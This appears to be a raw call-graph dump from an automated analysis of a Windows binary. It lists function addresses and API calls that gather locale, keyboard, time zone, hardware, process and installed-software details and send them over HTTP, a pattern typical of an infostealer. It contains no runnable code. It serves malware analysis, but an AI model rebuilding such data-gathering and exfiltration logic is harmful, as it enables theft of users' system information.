14643->14644 14645 1348fe 14644->14645 14646 14a740 lstrcpy 14645->14646 14647 13490b InternetOpenA StrCmpCA 14646->14647 14648 134944 14647->14648 14649 134ecb InternetCloseHandle 14648->14649 15693 148b60 14648->15693 14651 134ee8 14649->14651 15708 139ac0 CryptStringToBinaryA 14651->15708 14652 134963 15701 14a920 14652->15701 14655 134976 14657 14a8a0 lstrcpy 14655->14657 14662 13497f 14657->14662 14658 14a820 2 API calls 14659 134f05 14658->14659 14660 14a9b0 4 API calls 14659->14660 14663 134f1b 14660->14663 14661 134f27 codecvt 14665 14a7a0 lstrcpy 14661->14665 14666 14a9b0 4 API calls 14662->14666 14664 14a8a0 lstrcpy 14663->14664 14664->14661 14678 134f57 14665->14678 14667 1349a9 14666->14667 14668 14a8a0 lstrcpy 14667->14668 14669 1349b2 14668->14669 14670 14a9b0 4 API calls 14669->14670 14671 1349d1 14670->14671 14672 14a8a0 lstrcpy 14671->14672 14673 1349da 14672->14673 14674 14a920 3 API calls 14673->14674 14675 1349f8 14674->14675 14676 14a8a0 lstrcpy 14675->14676 14677 134a01 14676->14677 14679 14a9b0 4 API calls 14677->14679 14678->13699 14680 134a20 14679->14680 14681 14a8a0 lstrcpy 14680->14681 14682 134a29 14681->14682 14683 14a9b0 4 API calls 14682->14683 14684 134a48 14683->14684 14685 14a8a0 lstrcpy 14684->14685 14686 134a51 14685->14686 14687 14a9b0 4 API calls 14686->14687 14688 134a7d 14687->14688 14689 14a920 3 API calls 14688->14689 14690 134a84 14689->14690 14691 14a8a0 lstrcpy 14690->14691 14692 134a8d 14691->14692 14693 134aa3 InternetConnectA 14692->14693 14693->14649 14694 134ad3 HttpOpenRequestA 14693->14694 14696 134b28 14694->14696 14697 134ebe InternetCloseHandle 14694->14697 14698 14a9b0 4 API calls 14696->14698 14697->14649 14699 134b3c 14698->14699 14700 14a8a0 lstrcpy 14699->14700 14701 134b45 14700->14701 14702 14a920 3 API calls 14701->14702 14703 134b63 14702->14703 14704 14a8a0 lstrcpy 14703->14704 14705 134b6c 14704->14705 14706 14a9b0 4 API calls 14705->14706 14707 134b8b 14706->14707 14708 14a8a0 lstrcpy 14707->14708 14709 134b94 14708->14709 14710 14a9b0 4 API calls 14709->14710 14711 134bb5 14710->14711 14712 14a8a0 lstrcpy 14711->14712 14713 134bbe 14712->14713 14714 14a9b0 4 API calls 14713->14714 14715 134bde 14714->14715 14716 14a8a0 lstrcpy 14715->14716 14717 134be7 14716->14717 14718 14a9b0 4 API calls 14717->14718 14719 134c06 14718->14719 14720 14a8a0 lstrcpy 14719->14720 14721 134c0f 14720->14721 14722 14a920 3 API calls 14721->14722 14723 134c2d 14722->14723 14724 14a8a0 lstrcpy 14723->14724 14725 134c36 14724->14725 14726 14a9b0 4 API calls 14725->14726 14727 134c55 14726->14727 14728 14a8a0 lstrcpy 14727->14728 14729 134c5e 14728->14729 14730 14a9b0 4 API calls 14729->14730 14731 134c7d 14730->14731 14732 14a8a0 lstrcpy 14731->14732 14733 134c86 14732->14733 14734 14a920 3 API calls 14733->14734 14735 134ca4 14734->14735 14736 14a8a0 lstrcpy 14735->14736 14737 134cad 14736->14737 14738 14a9b0 4 API calls 14737->14738 14739 134ccc 14738->14739 14740 14a8a0 lstrcpy 14739->14740 14741 134cd5 14740->14741 14742 14a9b0 4 API calls 14741->14742 14743 134cf6 14742->14743 14744 14a8a0 lstrcpy 14743->14744 14745 134cff 14744->14745 14746 14a9b0 4 API calls 14745->14746 14747 134d1f 14746->14747 14748 14a8a0 lstrcpy 14747->14748 14749 134d28 14748->14749 14750 14a9b0 4 API calls 14749->14750 14751 134d47 14750->14751 14752 14a8a0 lstrcpy 14751->14752 14753 134d50 14752->14753 14754 14a920 3 API calls 14753->14754 14755 134d6e 14754->14755 14756 14a8a0 lstrcpy 14755->14756 14757 134d77 14756->14757 14758 14a740 lstrcpy 14757->14758 14759 134d92 14758->14759 14760 14a920 3 API calls 14759->14760 14761 134db3 14760->14761 14762 14a920 3 API calls 14761->14762 14763 134dba 14762->14763 14764 14a8a0 lstrcpy 14763->14764 14765 134dc6 14764->14765 14766 134de7 lstrlen 14765->14766 14767 134dfa 14766->14767 14768 134e03 lstrlen 14767->14768 15707 14aad0 14768->15707 14770 134e13 HttpSendRequestA 14771 134e32 InternetReadFile 14770->14771 14772 134e67 InternetCloseHandle 14771->14772 14777 134e5e 14771->14777 14775 14a800 14772->14775 14774 14a9b0 4 API calls 14774->14777 14775->14697 14776 14a8a0 lstrcpy 14776->14777 14777->14771 14777->14772 14777->14774 14777->14776 15714 14aad0 14778->15714 14780 1417c4 StrCmpCA 14781 1417cf ExitProcess 14780->14781 14782 1417d7 14780->14782 14783 1419c2 14782->14783 14784 141970 StrCmpCA 14782->14784 14785 1418f1 StrCmpCA 14782->14785 14786 141951 StrCmpCA 14782->14786 14787 141932 StrCmpCA 14782->14787 14788 141913 StrCmpCA 14782->14788 14789 14185d StrCmpCA 14782->14789 14790 14187f StrCmpCA 14782->14790 14791 1418ad StrCmpCA 14782->14791 14792 1418cf StrCmpCA 14782->14792 14793 14a820 lstrlen lstrcpy 14782->14793 14783->13701 14784->14782 14785->14782 14786->14782 14787->14782 14788->14782 14789->14782 14790->14782 14791->14782 14792->14782 14793->14782 14795 14a7a0 lstrcpy 14794->14795 14796 135979 14795->14796 14797 1347b0 2 API calls 14796->14797 14798 135985 14797->14798 14799 14a740 lstrcpy 14798->14799 14800 1359ba 14799->14800 14801 14a740 lstrcpy 14800->14801 14802 1359c7 14801->14802 14803 14a740 lstrcpy 14802->14803 14804 1359d4 14803->14804 14805 14a740 lstrcpy 14804->14805 14806 1359e1 14805->14806 14807 14a740 lstrcpy 14806->14807 14808 1359ee InternetOpenA StrCmpCA 14807->14808 14809 135a1d 14808->14809 14810 135fc3 InternetCloseHandle 14809->14810 14811 148b60 3 API calls 14809->14811 14812 135fe0 14810->14812 14813 135a3c 14811->14813 14815 139ac0 4 API calls 14812->14815 14814 14a920 3 API calls 14813->14814 14816 135a4f 14814->14816 14817 135fe6 14815->14817 14818 14a8a0 lstrcpy 14816->14818 14819 14a820 2 API calls 14817->14819 14821 13601f codecvt 14817->14821 14823 135a58 14818->14823 14820 135ffd 14819->14820 14822 14a9b0 4 API calls 14820->14822 14825 14a7a0 lstrcpy 14821->14825 14824 136013 14822->14824 14827 14a9b0 4 API calls 14823->14827 14826 14a8a0 lstrcpy 14824->14826 14835 13604f 14825->14835 14826->14821 14828 135a82 14827->14828 14829 14a8a0 lstrcpy 14828->14829 14830 135a8b 14829->14830 14831 14a9b0 4 API calls 14830->14831 14832 135aaa 14831->14832 14833 14a8a0 lstrcpy 14832->14833 14834 135ab3 14833->14834 14836 14a920 3 API calls 14834->14836 14835->13707 14837 135ad1 14836->14837 14838 14a8a0 lstrcpy 14837->14838 14839 135ada 14838->14839 14840 14a9b0 4 API calls 14839->14840 14841 135af9 14840->14841 14842 14a8a0 lstrcpy 14841->14842 14843 135b02 14842->14843 14844 14a9b0 4 API calls 14843->14844 14845 135b21 14844->14845 14846 14a8a0 lstrcpy 14845->14846 14847 135b2a 14846->14847 14848 14a9b0 4 API calls 14847->14848 14849 135b56 14848->14849 14850 14a920 3 API calls 14849->14850 14851 135b5d 14850->14851 14852 14a8a0 lstrcpy 14851->14852 14853 135b66 14852->14853 14854 135b7c InternetConnectA 14853->14854 14854->14810 14855 135bac HttpOpenRequestA 14854->14855 14857 135fb6 InternetCloseHandle 14855->14857 14858 135c0b 14855->14858 14857->14810 14859 14a9b0 4 API calls 14858->14859 14860 135c1f 14859->14860 14861 14a8a0 lstrcpy 14860->14861 14862 135c28 14861->14862 14863 14a920 3 API calls 14862->14863 14864 135c46 14863->14864 14865 14a8a0 lstrcpy 14864->14865 14866 135c4f 14865->14866 14867 14a9b0 4 API calls 14866->14867 14868 135c6e 14867->14868 14869 14a8a0 lstrcpy 14868->14869 14870 135c77 14869->14870 14871 14a9b0 4 API calls 14870->14871 14872 135c98 14871->14872 14873 14a8a0 lstrcpy 14872->14873 14874 135ca1 14873->14874 14875 14a9b0 4 API calls 14874->14875 14876 135cc1 14875->14876 14877 14a8a0 lstrcpy 14876->14877 14878 135cca 14877->14878 14879 14a9b0 4 API calls 14878->14879 14880 135ce9 14879->14880 14881 14a8a0 lstrcpy 14880->14881 14882 135cf2 14881->14882 14883 14a920 3 API calls 14882->14883 14884 135d10 14883->14884 14885 14a8a0 lstrcpy 14884->14885 14886 135d19 14885->14886 14887 14a9b0 4 API calls 14886->14887 14888 135d38 14887->14888 14889 14a8a0 lstrcpy 14888->14889 14890 135d41 14889->14890 14891 14a9b0 4 API calls 14890->14891 14892 135d60 14891->14892 14893 14a8a0 lstrcpy 14892->14893 14894 135d69 14893->14894 14895 14a920 3 API calls 14894->14895 14896 135d87 14895->14896 14897 14a8a0 lstrcpy 14896->14897 14898 135d90 14897->14898 14899 14a9b0 4 API calls 14898->14899 14900 135daf 14899->14900 14901 14a8a0 lstrcpy 14900->14901 14902 135db8 14901->14902 14903 14a9b0 4 API calls 14902->14903 14904 135dd9 14903->14904 14905 14a8a0 lstrcpy 14904->14905 14906 135de2 14905->14906 14907 14a9b0 4 API calls 14906->14907 14908 135e02 14907->14908 14909 14a8a0 lstrcpy 14908->14909 14910 135e0b 14909->14910 14911 14a9b0 4 API calls 14910->14911 14912 135e2a 14911->14912 14913 14a8a0 lstrcpy 14912->14913 14914 135e33 14913->14914 14915 14a920 3 API calls 14914->14915 14916 135e54 14915->14916 14917 14a8a0 lstrcpy 14916->14917 14918 135e5d 14917->14918 14919 135e70 lstrlen 14918->14919 15715 14aad0 14919->15715 14921 135e81 lstrlen GetProcessHeap RtlAllocateHeap 15716 14aad0 14921->15716 14923 135eae lstrlen 14924 135ebe 14923->14924 14925 135ed7 lstrlen 14924->14925 14926 135ee7 14925->14926 14927 135ef0 lstrlen 14926->14927 14928 135f03 14927->14928 14929 135f1a lstrlen 14928->14929 15717 14aad0 14929->15717 14931 135f2a HttpSendRequestA 14932 135f35 InternetReadFile 14931->14932 14933 135f6a InternetCloseHandle 14932->14933 14937 135f61 14932->14937 14933->14857 14935 14a9b0 4 API calls 14935->14937 14936 14a8a0 lstrcpy 14936->14937 14937->14932 14937->14933 14937->14935 14937->14936 14940 141077 14938->14940 14939 141151 14939->13709 14940->14939 14941 14a820 lstrlen lstrcpy 14940->14941 14941->14940 14943 140db7 14942->14943 14944 140f17 14943->14944 14945 140ea4 StrCmpCA 14943->14945 14946 140e27 StrCmpCA 14943->14946 14947 140e67 StrCmpCA 14943->14947 14948 14a820 lstrlen lstrcpy 14943->14948 14944->13717 14945->14943 14946->14943 14947->14943 14948->14943 14952 140f67 14949->14952 14950 141044 14950->13725 14951 140fb2 StrCmpCA 14951->14952 14952->14950 14952->14951 14953 14a820 lstrlen lstrcpy 14952->14953 14953->14952 14955 14a740 lstrcpy 14954->14955 14956 141a26 14955->14956 14957 14a9b0 4 API calls 14956->14957 14958 141a37 14957->14958 14959 14a8a0 lstrcpy 14958->14959 14960 141a40 14959->14960 14961 14a9b0 4 API calls 14960->14961 14962 141a5b 14961->14962 14963 14a8a0 lstrcpy 14962->14963 14964 141a64 14963->14964 14965 14a9b0 4 API calls 14964->14965 14966 141a7d 14965->14966 14967 14a8a0 lstrcpy 14966->14967 14968 141a86 14967->14968 14969 14a9b0 4 API calls 14968->14969 14970 141aa1 14969->14970 14971 14a8a0 lstrcpy 14970->14971 14972 141aaa 14971->14972 14973 14a9b0 4 API calls 14972->14973 14974 141ac3 14973->14974 14975 14a8a0 lstrcpy 14974->14975 14976 141acc 14975->14976 14977 14a9b0 4 API calls 14976->14977 14978 141ae7 14977->14978 14979 14a8a0 lstrcpy 14978->14979 14980 141af0 14979->14980 14981 14a9b0 4 API calls 14980->14981 14982 141b09 14981->14982 14983 14a8a0 lstrcpy 14982->14983 14984 141b12 14983->14984 14985 14a9b0 4 API calls 14984->14985 14986 141b2d 14985->14986 14987 14a8a0 lstrcpy 14986->14987 14988 141b36 14987->14988 14989 14a9b0 4 API calls 14988->14989 14990 141b4f 14989->14990 14991 14a8a0 lstrcpy 14990->14991 14992 141b58 14991->14992 14993 14a9b0 4 API calls 14992->14993 14994 141b76 14993->14994 14995 14a8a0 lstrcpy 14994->14995 14996 141b7f 14995->14996 14997 147500 6 API calls 14996->14997 14998 141b96 14997->14998 14999 14a920 3 API calls 14998->14999 15000 141ba9 14999->15000 15001 14a8a0 lstrcpy 15000->15001 15002 141bb2 15001->15002 15003 14a9b0 4 API calls 15002->15003 15004 141bdc 15003->15004 15005 14a8a0 lstrcpy 15004->15005 15006 141be5 15005->15006 15007 14a9b0 4 API calls 15006->15007 15008 141c05 15007->15008 15009 14a8a0 lstrcpy 15008->15009 15010 141c0e 15009->15010 15718 147690 GetProcessHeap RtlAllocateHeap 15010->15718 15013 14a9b0 4 API calls 15014 141c2e 15013->15014 15015 14a8a0 lstrcpy 15014->15015 15016 141c37 15015->15016 15017 14a9b0 4 API calls 15016->15017 15018 141c56 15017->15018 15019 14a8a0 lstrcpy 15018->15019 15020 141c5f 15019->15020 15021 14a9b0 4 API calls 15020->15021 15022 141c80 15021->15022 15023 14a8a0 lstrcpy 15022->15023 15024 141c89 15023->15024 15725 1477c0 GetCurrentProcess IsWow64Process 15024->15725 15027 14a9b0 4 API calls 15028 141ca9 15027->15028 15029 14a8a0 lstrcpy 15028->15029 15030 141cb2 15029->15030 15031 14a9b0 4 API calls 15030->15031 15032 141cd1 15031->15032 15033 14a8a0 lstrcpy 15032->15033 15034 141cda 15033->15034 15035 14a9b0 4 API calls 15034->15035 15036 141cfb 15035->15036 15037 14a8a0 lstrcpy 15036->15037 15038 141d04 15037->15038 15039 147850 3 API calls 15038->15039 15040 141d14 15039->15040 15041 14a9b0 4 API calls 15040->15041 15042 141d24 15041->15042 15043 14a8a0 lstrcpy 15042->15043 15044 141d2d 15043->15044 15045 14a9b0 4 API calls 15044->15045 15046 141d4c 15045->15046 15047 14a8a0 lstrcpy 15046->15047 15048 141d55 15047->15048 15049 14a9b0 4 API calls 15048->15049 15050 141d75 15049->15050 15051 14a8a0 lstrcpy 15050->15051 15052 141d7e 15051->15052 15053 1478e0 3 API calls 15052->15053 15054 141d8e 15053->15054 15055 14a9b0 4 API calls 15054->15055 15056 141d9e 15055->15056 15057 14a8a0 lstrcpy 15056->15057 15058 141da7 15057->15058 15059 14a9b0 4 API calls 15058->15059 15060 141dc6 15059->15060 15061 14a8a0 lstrcpy 15060->15061 15062 141dcf 15061->15062 15063 14a9b0 4 API calls 15062->15063 15064 141df0 15063->15064 15065 14a8a0 lstrcpy 15064->15065 15066 141df9 15065->15066 15727 147980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15066->15727 15069 14a9b0 4 API calls 15070 141e19 15069->15070 15071 14a8a0 lstrcpy 15070->15071 15072 141e22 15071->15072 15073 14a9b0 4 API calls 15072->15073 15074 141e41 15073->15074 15075 14a8a0 lstrcpy 15074->15075 15076 141e4a 15075->15076 15077 14a9b0 4 API calls 15076->15077 15078 141e6b 15077->15078 15079 14a8a0 lstrcpy 15078->15079 15080 141e74 15079->15080 15729 147a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15080->15729 15083 14a9b0 4 API calls 15084 141e94 15083->15084 15085 14a8a0 lstrcpy 15084->15085 15086 141e9d 15085->15086 15087 14a9b0 4 API calls 15086->15087 15088 141ebc 15087->15088 15089 14a8a0 lstrcpy 15088->15089 15090 141ec5 15089->15090 15091 14a9b0 4 API calls 15090->15091 15092 141ee5 15091->15092 15093 14a8a0 lstrcpy 15092->15093 15094 141eee 15093->15094 15732 147b00 GetUserDefaultLocaleName 15094->15732 15097 14a9b0 4 API calls 15098 141f0e 15097->15098 15099 14a8a0 lstrcpy 15098->15099 15100 141f17 15099->15100 15101 14a9b0 4 API calls 15100->15101 15102 141f36 15101->15102 15103 14a8a0 lstrcpy 15102->15103 15104 141f3f 15103->15104 15105 14a9b0 4 API calls 15104->15105 15106 141f60 15105->15106 15107 14a8a0 lstrcpy 15106->15107 15108 141f69 15107->15108 15736 147b90 15108->15736 15110 141f80 15111 14a920 3 API calls 15110->15111 15112 141f93 15111->15112 15113 14a8a0 lstrcpy 15112->15113 15114 141f9c 15113->15114 15115 14a9b0 4 API calls 15114->15115 15116 141fc6 15115->15116 15117 14a8a0 lstrcpy 15116->15117 15118 141fcf 15117->15118 15119 14a9b0 4 API calls 15118->15119 15120 141fef 15119->15120 15121 14a8a0 lstrcpy 15120->15121 15122 141ff8 15121->15122 15748 147d80 GetSystemPowerStatus 15122->15748 15125 14a9b0 4 API calls 15126 142018 15125->15126 15127 14a8a0 lstrcpy 15126->15127 15128 142021 15127->15128 15129 14a9b0 4 API calls 15128->15129 15130 142040 15129->15130 15131 14a8a0 lstrcpy 15130->15131 15132 142049 15131->15132 15133 14a9b0 4 API calls 15132->15133 15134 14206a 15133->15134 15135 14a8a0 lstrcpy 15134->15135 15136 142073 15135->15136 15137 14207e GetCurrentProcessId 15136->15137 15750 149470 OpenProcess 15137->15750 15140 14a920 3 API calls 15141 1420a4 15140->15141 15142 14a8a0 lstrcpy 15141->15142 15143 1420ad 15142->15143 15144 14a9b0 4 API calls 15143->15144 15145 1420d7 15144->15145 15146 14a8a0 lstrcpy 15145->15146 15147 1420e0 15146->15147 15148 14a9b0 4 API calls 15147->15148 15149 142100 15148->15149 15150 14a8a0 lstrcpy 15149->15150 15151 142109 15150->15151 15755 147e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15151->15755 15154 14a9b0 4 API calls 15155 142129 15154->15155 15156 14a8a0 lstrcpy 15155->15156 15157 142132 15156->15157 15158 14a9b0 4 API calls 15157->15158 15159 142151 15158->15159 15160 14a8a0 lstrcpy 15159->15160 15161 14215a 15160->15161 15162 14a9b0 4 API calls 15161->15162 15163 14217b 15162->15163 15164 14a8a0 lstrcpy 15163->15164 15165 142184 15164->15165 15759 147f60 15165->15759 15168 14a9b0 4 API calls 15169 1421a4 15168->15169 15170 14a8a0 lstrcpy 15169->15170 15171 1421ad 15170->15171 15172 14a9b0 4 API calls 15171->15172 15173 1421cc 15172->15173 15174 14a8a0 lstrcpy 15173->15174 15175 1421d5 15174->15175 15176 14a9b0 4 API calls 15175->15176 15177 1421f6 15176->15177 15178 14a8a0 lstrcpy 15177->15178 15179 1421ff 15178->15179 15772 147ed0 GetSystemInfo wsprintfA 15179->15772 15182 14a9b0 4 API calls 15183 14221f 15182->15183 15184 14a8a0 lstrcpy 15183->15184 15185 142228 15184->15185 15186 14a9b0 4 API calls 15185->15186 15187 142247 15186->15187 15188 14a8a0 lstrcpy 15187->15188 15189 142250 15188->15189 15190 14a9b0 4 API calls 15189->15190 15191 142270 15190->15191 15192 14a8a0 lstrcpy 15191->15192 15193 142279 15192->15193 15774 148100 GetProcessHeap RtlAllocateHeap 15193->15774 15196 14a9b0 4 API calls 15197 142299 15196->15197 15198 14a8a0 lstrcpy 15197->15198 15199 1422a2 15198->15199 15200 14a9b0 4 API calls 15199->15200 15201 1422c1 15200->15201 15202 14a8a0 lstrcpy 15201->15202 15203 1422ca 15202->15203 15204 14a9b0 4 API calls 15203->15204 15205 1422eb 15204->15205 15206 14a8a0 lstrcpy 15205->15206 15207 1422f4 15206->15207 15780 1487c0 15207->15780 15210 14a920 3 API calls 15211 14231e 15210->15211 15212 14a8a0 lstrcpy 15211->15212 15213 142327 15212->15213 15214 14a9b0 4 API calls 15213->15214 15215 142351 15214->15215 15216 14a8a0 lstrcpy 15215->15216 15217 14235a 15216->15217 15218 14a9b0 4 API calls 15217->15218 15219 14237a 15218->15219 15220 14a8a0 lstrcpy 15219->15220 15221 142383 15220->15221 15222 14a9b0 4 API calls 15221->15222 15223 1423a2 15222->15223 15224 14a8a0 lstrcpy 15223->15224 15225 1423ab 15224->15225 15785 1481f0 15225->15785 15227 1423c2 15228 14a920 3 API calls 15227->15228 15229 1423d5 15228->15229 15230 14a8a0 lstrcpy 15229->15230 15231 1423de 15230->15231 15232 14a9b0 4 API calls 15231->15232 15233 14240a 15232->15233 15234 14a8a0 lstrcpy 15233->15234 15235 142413 15234->15235 15236 14a9b0 4 API calls 15235->15236 15237 142432 15236->15237 15238 14a8a0 lstrcpy 15237->15238 15239 14243b 15238->15239 15240 14a9b0 4 API calls 15239->15240 15241 14245c 15240->15241 15242 14a8a0 lstrcpy 15241->15242 15243 142465 15242->15243 15244 14a9b0 4 API calls 15243->15244 15245 142484 15244->15245 15246 14a8a0 lstrcpy 15245->15246 15247 14248d 15246->15247 15248 14a9b0 4 API calls 15247->15248 15249 1424ae 15248->15249 15250 14a8a0 lstrcpy 15249->15250 15251 1424b7 15250->15251 15793 148320 15251->15793 15253 1424d3 15254 14a920 3 API calls 15253->15254 15255 1424e6 15254->15255 15256 14a8a0 lstrcpy 15255->15256 15257 1424ef 15256->15257 15258 14a9b0 4 API calls 15257->15258 15259 142519 15258->15259 15260 14a8a0 lstrcpy 15259->15260 15261 142522 15260->15261 15262 14a9b0 4 API calls 15261->15262 15263 142543 15262->15263 15264 14a8a0 lstrcpy 15263->15264 15265 14254c 15264->15265 15266 148320 17 API calls 15265->15266 15267 142568 15266->15267 15268 14a920 3 API calls 15267->15268 15269 14257b 15268->15269 15270 14a8a0 lstrcpy 15269->15270 15271 142584 15270->15271 15272 14a9b0 4 API calls 15271->15272 15273 1425ae 15272->15273 15274 14a8a0 lstrcpy 15273->15274 15275 1425b7 15274->15275 15276 14a9b0 4 API calls 15275->15276 15277 1425d6 15276->15277 15278 14a8a0 lstrcpy 15277->15278 15279 1425df 15278->15279 15280 14a9b0 4 API calls 15279->15280 15281 142600 15280->15281 15282 14a8a0 lstrcpy 15281->15282 15283 142609 15282->15283 15829 148680 15283->15829 15285 142620 15286 14a920 3 API calls 15285->15286 15287 142633 15286->15287 15288 14a8a0 lstrcpy 15287->15288 15289 14263c 15288->15289 15290 14265a lstrlen 15289->15290 15291 14266a 15290->15291 15292 14a740 lstrcpy 15291->15292 15293 14267c 15292->15293 15294 131590 lstrcpy 15293->15294 15295 14268d 15294->15295 15839 145190 15295->15839 15297 142699 15297->13729 16027 14aad0 15298->16027 15300 135009 InternetOpenUrlA 15304 135021 15300->15304 15301 1350a0 InternetCloseHandle InternetCloseHandle 15303 1350ec 15301->15303 15302 13502a InternetReadFile 15302->15304 15303->13733 15304->15301 15304->15302 16028 1398d0 15305->16028 15307 140759 15308 14077d 15307->15308 15309 140a38 15307->15309 15312 140799 StrCmpCA 15308->15312 15310 131590 lstrcpy 15309->15310 15311 140a49 15310->15311 16204 140250 15311->16204 15314 1407a8 15312->15314 15340 140843 15312->15340 15316 14a7a0 lstrcpy 15314->15316 15318 1407c3 15316->15318 15317 140865 StrCmpCA 15320 140874 15317->15320 15357 14096b 15317->15357 15319 131590 lstrcpy 15318->15319 15321 14080c 15319->15321 15322 14a740 lstrcpy 15320->15322 15323 14a7a0 lstrcpy 15321->15323 15325 140881 15322->15325 15326 140823 15323->15326 15324 14099c StrCmpCA 15327 1409ab 15324->15327 15346 140a2d 15324->15346 15328 14a9b0 4 API calls 15325->15328 15329 14a7a0 lstrcpy 15326->15329 15330 131590 lstrcpy 15327->15330 15331 1408ac 15328->15331 15333 14083e 15329->15333 15334 1409f4 15330->15334 15332 14a920 3 API calls 15331->15332 15335 1408b3 15332->15335 16031 13fb00 15333->16031 15337 14a7a0 lstrcpy 15334->15337 15339 14a9b0 4 API calls 15335->15339 15338 140a0d 15337->15338 15341 14a7a0 lstrcpy 15338->15341 15342 1408ba 15339->15342 15340->15317 15343 140a28 15341->15343 15346->13737 15357->15324 15679 14a7a0 lstrcpy 15678->15679 15680 131683 15679->15680 15681 14a7a0 lstrcpy 15680->15681 15682 131695 15681->15682 15683 14a7a0 lstrcpy 15682->15683 15684 1316a7 15683->15684 15685 14a7a0 lstrcpy 15684->15685 15686 1315a3 15685->15686 15686->14560 15688 1347c6 15687->15688 15689 134838 lstrlen 15688->15689 15713 14aad0 15689->15713 15691 134848 InternetCrackUrlA 15692 134867 15691->15692 15692->14637 15694 14a740 lstrcpy 15693->15694 15695 148b74 15694->15695 15696 14a740 lstrcpy 15695->15696 15697 148b82 GetSystemTime 15696->15697 15699 148b99 15697->15699 15698 14a7a0 lstrcpy 15700 148bfc 15698->15700 15699->15698 15700->14652 15702 14a931 15701->15702 15703 14a988 15702->15703 15705 14a968 lstrcpy lstrcat 15702->15705 15704 14a7a0 lstrcpy 15703->15704 15706 14a994 15704->15706 15705->15703 15706->14655 15707->14770 15709 134eee 15708->15709 15710 139af9 LocalAlloc 15708->15710 15709->14658 15709->14661 15710->15709 15711 139b14 CryptStringToBinaryA 15710->15711 15711->15709 15712 139b39 LocalFree 15711->15712 15712->15709 15713->15691 15714->14780 15715->14921 15716->14923 15717->14931 15846 1477a0 15718->15846 15721 1476c6 RegOpenKeyExA 15723 147704 RegCloseKey 15721->15723 15724 1476e7 RegQueryValueExA 15721->15724 15722 141c1e 15722->15013 15723->15722 15724->15723 15726 141c99 15725->15726 15726->15027 15728 141e09 15727->15728 15728->15069 15730 141e84 15729->15730 15731 147a9a wsprintfA 15729->15731 15730->15083 15731->15730 15733 141efe 15732->15733 15734 147b4d 15732->15734 15733->15097 15853 148d20 LocalAlloc CharToOemW 15734->15853 15737 14a740 lstrcpy 15736->15737 15738 147bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15737->15738 15745 147c25 15738->15745 15739 147c46 GetLocaleInfoA 15739->15745 15740 147d18 15741 147d1e LocalFree 15740->15741 15742 147d28 15740->15742 15741->15742 15744 14a7a0 lstrcpy 15742->15744 15743 14a9b0 lstrcpy lstrlen lstrcpy lstrcat 15743->15745 15746 147d37 15744->15746 15745->15739 15745->15740 15745->15743 15747 14a8a0 lstrcpy 15745->15747 15746->15110 15747->15745 15749 142008 15748->15749 15749->15125 15751 1494b5 15750->15751 15752 149493 GetModuleFileNameExA CloseHandle 15750->15752 15753 14a740 lstrcpy 15751->15753 15752->15751 15754 142091 15753->15754 15754->15140 15756 147e68 RegQueryValueExA 15755->15756 15758 142119 15755->15758 15757 147e8e RegCloseKey 15756->15757 15757->15758 15758->15154 15760 147fb9 GetLogicalProcessorInformationEx 15759->15760 15761 147fd8 GetLastError 15760->15761 15763 148029 15760->15763 15769 147fe3 15761->15769 15771 148022 15761->15771 15762 142194 15762->15168 15767 1489f0 2 API calls 15763->15767 15766 1489f0 2 API calls 15766->15762 15768 14807b 15767->15768 15770 148084 wsprintfA 15768->15770 15768->15771 15769->15760 15769->15762 15854 1489f0 15769->15854 15857 148a10 GetProcessHeap RtlAllocateHeap 15769->15857 15770->15762 15771->15762 15771->15766 15773 14220f 15772->15773 15773->15182 15775 1489b0 15774->15775 15776 14814d GlobalMemoryStatusEx 15775->15776 15779 148163 __aulldiv 15776->15779 15777 14819b wsprintfA 15778 142289 15777->15778 15778->15196 15779->15777 15781 1487fb GetProcessHeap RtlAllocateHeap wsprintfA 15780->15781 15783 14a740 lstrcpy 15781->15783 15784 14230b 15783->15784 15784->15210 15786 14a740 lstrcpy 15785->15786 15792 148229 15786->15792 15787 148263 15788 14a7a0 lstrcpy 15787->15788 15790 1482dc 15788->15790 15789 14a9b0 lstrcpy lstrlen lstrcpy lstrcat 15789->15792 15790->15227 15791 14a8a0 lstrcpy 15791->15792 15792->15787 15792->15789 15792->15791 15794 14a740 lstrcpy 15793->15794 15795 14835c RegOpenKeyExA 15794->15795 15796 1483d0 15795->15796 15797 1483ae 15795->15797 15799 148613 RegCloseKey 15796->15799 15800 1483f8 RegEnumKeyExA 15796->15800 15798 14a7a0 lstrcpy 15797->15798 15810 1483bd 15798->15810 15801 14a7a0 lstrcpy 15799->15801 15802 14860e 15800->15802 15803 14843f wsprintfA RegOpenKeyExA 15800->15803 15801->15810 15802->15799 15804 148485 RegCloseKey RegCloseKey 15803->15804 15805 1484c1 RegQueryValueExA 15803->15805 15808 14a7a0 lstrcpy 15804->15808 15806 148601 RegCloseKey 15805->15806 15807 1484fa lstrlen 15805->15807 15806->15802 15807->15806 15809 148510 15807->15809 15808->15810 15811 14a9b0 4 API calls 15809->15811 15810->15253 15812 148527 15811->15812 15813 14a8a0 lstrcpy 15812->15813 15814 148533 15813->15814 15815 14a9b0 4 API calls 15814->15815 15816 148557 15815->15816 15817 14a8a0 lstrcpy 15816->15817 15818 148563 15817->15818 15819 14856e RegQueryValueExA 15818->15819 15819->15806 15820 1485a3 15819->15820 15821 14a9b0 4 API calls 15820->15821 15822 1485ba 15821->15822 15823 14a8a0 lstrcpy 15822->15823 15824 1485c6 15823->15824 15825 14a9b0 4 API calls 15824->15825 15826 1485ea 15825->15826 15827 14a8a0 lstrcpy 15826->15827 15828 1485f6 15827->15828 15828->15806 15830 14a740 lstrcpy 15829->15830 15831 1486bc CreateToolhelp32Snapshot Process32First 15830->15831 15832 14875d CloseHandle 15831->15832 15833 1486e8 Process32Next 15831->15833 15834 14a7a0 lstrcpy 15832->15834 15833->15832 15835 1486fd 15833->15835 15836 148776 15834->15836 15835->15833 15837 14a9b0 lstrcpy lstrlen lstrcpy lstrcat 15835->15837 15838 14a8a0 lstrcpy 15835->15838 15836->15285 15837->15835 15838->15835 15840 14a7a0 lstrcpy 15839->15840 15841 1451b5 15840->15841 15842 131590 lstrcpy 15841->15842 15843 1451c6 15842->15843 15858 135100 15843->15858 15845 1451cf 15845->15297 15849 147720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15846->15849 15848 1476b9 15848->15721 15848->15722 15850 147765 RegQueryValueExA 15849->15850 15851 147780 RegCloseKey 15849->15851 15850->15851 15852 147793 15851->15852 15852->15848 15853->15733 15855 148a0c 15854->15855 